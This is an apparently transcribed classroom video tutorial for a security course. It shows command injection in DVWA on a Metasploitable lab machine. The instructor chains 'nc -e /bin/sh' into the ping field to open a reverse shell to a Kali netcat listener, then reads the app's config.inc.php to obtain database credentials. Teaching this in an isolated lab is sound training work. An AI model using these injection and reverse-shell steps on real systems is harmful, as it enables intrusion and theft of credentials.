Hello everyone, it's glad to see you again. In this video tutorial, I will show you a demo how to perform command injection using DAM vulnerability web apps, right? To do some penetration testing. Okay, so without further ado, let me start with the background. Okay, so we're gonna use this tool. It's called Netcat and DVWA. Okay, DVWA. Uh, okay, so in Linux command, if we want to do some chaining or additional uh, command, we can use this semicolon, right? Semicolon or double ampersand or double pipeline. I will show you in a minute how to implement that when we go to the lab, all right? And what is Netcat? Well, Netcat is a command line networking utilities to read and write data. Okay, in the in the ethical hacking community, people used to call this Netcat as a Swiss Army knife, right? Because it's a very popular and useful tools. Okay, so Netcat, right? So that is the tools that we're gonna use. Okay, listener, right? These are some of the terminology that we may need to understand. Okay, or to know. The first one is listener. What is listener? Is create a server and listen to incoming connection, right? Create a server and listen to the incoming connection. Client, client means sends request to a listener, right? So listener is the server and client send request to the listener. What about shell? What is shell? Shell is a command line interface that interpret commands such as terminal or command.exe or PowerShell, right? Uh, we have bind shell and a reverse shell. Bind shell, in bind shell, the attacker connect directly to the remote machine. Listen on the victim machine, right? So let me make this bigger so you can see. Okay, so bind shell, attacker connect directly to remote machine, so listener on the victim machine. But reverse shell, which is this is the one that the most popular one and the common one, is force the remote machine to connect to the attacker, listener on the attacker machine, in this case Kali, right? As you can see here is on the chart. It's kind of small, but at least it helps you to understand the concept. All right. So here I have Metasploitable with Metasploitable 2 192.168.56.103. That will be my victim machine or the Metasploitable machine, and then I have the Kali, which is 192.168.56.116. I usually put this Kali Linux with a networking setting, right? In the networking setting, I put a net. This is my net address, and this is my host only adapter. Host only adapters, right? On the Metasploitable, I only put this as a host only adapter, which is 56.103. All right. So make sure that you know how to set up the environment first. If you need additional help how to set it up, then please contact the lab assistant through Discord application, right? They are open Monday through Thursday. I think Monday to Thursday is from 8 to 5, and then Friday is usually half day. All right. Okay. So here I'm going to see that, let me change the IP address. This is 116, right? This is going to be 103 actually. This is 103, and then this is also 103. Okay. This is 103. Because I have two labs, one is in the office and one is at home. This is in my home PC. So the first thing that we need to do, we need to open the Kali, right? We need to go to By the way, I will provide this documentation on the Blackboard. Okay, so I just make this recording for you. Okay, so I'm gonna open this Firefox, right? I'm gonna do Firefox. I'm gonna open. Let me put my note at the end on the other machine, right? So on the other things, so you can see it better. Let me put this one, Kali Linux, right? So here I'm gonna type 192. I'm gonna put the victim machine 190. I'm gonna put here, where is it? 192.168.11. No, it's not 106.106, right? No, this is 103. 103 slash DVWA p login.php. Okay. Oh, okay. Let me see if I have this proxy set up here. I need to delete this proxy because I use this from to my previous exercise. So I'm gonna cancel this no proxy. I'm gonna click OK because I use this for other lab. So here, let me refresh it. Boom, here we go. Okay, the username and password. Okay, here is my documentation, right? My documentation, right? So when you do this exercise, I would suggest that you print this, notes and understand the note, right? Have it side by side. That way, it helps you to do the lab, to perform the lab. So here I'm gonna use admin, and the password is password. Okay, and I don't want to save. And the next thing that you need to do, make sure that you change the security to low. Okay, to security to low, and then submit. Okay, so here we go, right? So this is my second step, and now go to command injection, command execution, right? Command execution. Command execution. So we're gonna type 192.168.56.103, submit, ping. Okay, here we go. So we are able to ping, right? So from here we are able to ping. Let's do 192.168.150c, and then we're gonna do who am I, right? Who am I, right? There we go. Here we go. So we are www-data, right? www-data. We are in that who am I. And then let's see that we're gonna do print working directory, pwd. Let's find out where are we right now. Normally, that's why we need to have input validation. As a web developer or a programmer, users should not be allowed to enter this IP address. The one way to prevent this or countermeasure this command execution is by input validation or sanitize the program, right? To sanitize the input. Make sure that users are not allowed to do this command execution. Print working directory. Okay, we are in the /var/ww DVWA directory, and then vulnerabilities and .exe mode. Okay, so now let's go to the Kali machine, and let's clear this out, right? This is what IP address here. This is 116, right? I'm gonna clear this. So I'm gonna use netcat, right? So we're gonna use netcat nc minus listening verbose host, minus port. Let's put 4444, right? Listening in port 444. So we are listening here, right? This is the attacker machine. So I'm opening this up. Here is my note there, right? in the Kali Linux and type this NC, and we are listening. Okay, now we're gonna open the browsers here, right? Let me see here, listening, and then the browsers. Let's put let's run this one. Let me see if I can copy this. Okay, let's see if I can copy and paste this. So copy and paste this. Okay, so here is the command 192.168.56.103. okay, colon netcat hyphen execution bin shell, and then here is the attacker machine 116.56.1 netcat execution, and our attacker machine is 116, right? And the port number is 444, right? So that is the command. All right, so 192.168.56.103, which is this vulnerable machine, we're gonna execute netcat nc-e space /bin/shell sh, and then this is the attacker machine 56.116 and port 44. Now I'm gonna click submit. Okay, when I click submit, notice that I have this thing, right, hanging there, right? So let's go back to this one, see if it's pick it up. Okay, let me see if it's listening. I'm gonna go here, and then I'm gonna see if I can do this. All right, so the next thing I'm gonna do is go to Kali, type PW. Okay, no, we're gonna click here, PWD, boom. Okay, well, we have some issue here, so let me pause this so I can troubleshoot that. Let me pause this. Okay, I was able to troubleshoot this because if it does happen to you, you just have to redo again, right? You need to log out and log in again, possibly close this Firefox and open again, right? That's how I troubleshoot it, because the command, there's nothing wrong. I don't have any error, syntax error here, right? Normally, if I have a space problem, then it's gonna give me a syntax error. But I just double check this again. Make sure you have space here, netcat and space -e hyphen e is execution, right? Make sure you verify the IP address, and I just click submit. Here we go. As you notice that if it's worked, it just hang there. It will be hanging over there, right? So the website will be hang. That means the connection is working, right? Earlier it didn't work. So if that happened to you, so you just have to close it, log out, completely close the Firefox and open again, and type it manually again, click submit, and that would work, right? If you still have issue, please log into Discord, and the lab assistant will help you. There are 3 lab assistants: Esteban Sedio, Reno Cantu in Star County, and we have another one which is Mario Ramirez. All right, so they are available to assist you. Okay, be sure you show my documentation. Okay, this help student to perform the labs. Okay, all right, so let me go to the next one. The next one is once I'm successfully do that, let's go to the netcat here. So now I'm gonna type pwd, which is the same thing, right? We are in the vulnerabilities/exec directory, and then I'm gonna type ls-la to find out what is inside there, right? From here, I'm gonna do cd dot dot, and then we're gonna do ls la again. So we have this one. We're gonna go to cd dot dot, right? Is it cd dot dot? Okay, and then I'm gonna go to cd dot dot again, and then ls. So we are in the source. Let me see. I should be able to see that. Hold on, I think we have some issue here. cd. Okay, let me see. Clear. This is cd. I'm sorry. This is supposed cd dot dot ls. Okay, cd space dot dot, right? And then ls. Now I will see all the information here, and then cd space dot dot ls again. Now I'm here in the DVWA, right? So I'm gonna change to what? cd. We're gonna change to, where is it? Print working that PWD, right? So we are in the DVWA vulnerability web application directory. From here, I'm gonna do cd space dot dot again. I'm gonna do ls minus la. Now we are in the inside directory of DVWLA, and then let's pay attention to this one. Config in, right? Where is config in? Hold on. I think we need to go here. We are in the CDW. Now we need to go to the config mode. So cd config cd config ls. Now we have php info, right? php info, right? So let me see. So php info. Now let's go to ls minus la. We have php info. So let's go to this one. We're gonna do cat. We're gonna do cat, and then cat config dot php. Okay, cat config dot php. Oh no, I have a typo here again. I need to go to cat config dot config php info. Config config cat config cat php info dot php. No, it's not there. Okay, let me troubleshoot this first. Okay, so I'm gonna pause this video first. All right, so I'm gonna pause this, and I will continue in the next one. Okay, so let me pause. I know what's the issue. This when I go to PW. Okay, let me see. When I click PWD, I should be in the DVWA directory, right? From here, I'm gonna go to ls minus la. Now we need to go to the config directory, right? cd config, right? cd config. Now if I go to lsla, you will see here, right? You will see config.inc.php. So here I'm gonna go cat config, right? .inc .php. Okay, open that. Here we go. Now we find the database server, right? The name of the database is DVWA. The username is root, and the password is none, right? And the SQL that they use is MySQL. From here we can do from here we can penetrate to the database. All right. So now, as you can see that, make sure that I'm gonna Control C first, right? Control C. So make sure that you are in the config directory. Okay. Let me scroll it up, right? Make sure you go here, right? cd config lsa cd config. So you are in the config directory. From config directory, you do ls space -la, right? That way you can see the configuration file of the database. From here, you go to cat space config.inc.php. Okay, so now you know the database name, the username, and the password. There is no password there, right? And the database management system they use is MySQL. So let me kill this process, Control C, okay? And I'm gonna continue in the next video for the MySQL connection. So let me stop this and see you in the next video, okay? Which is part 2.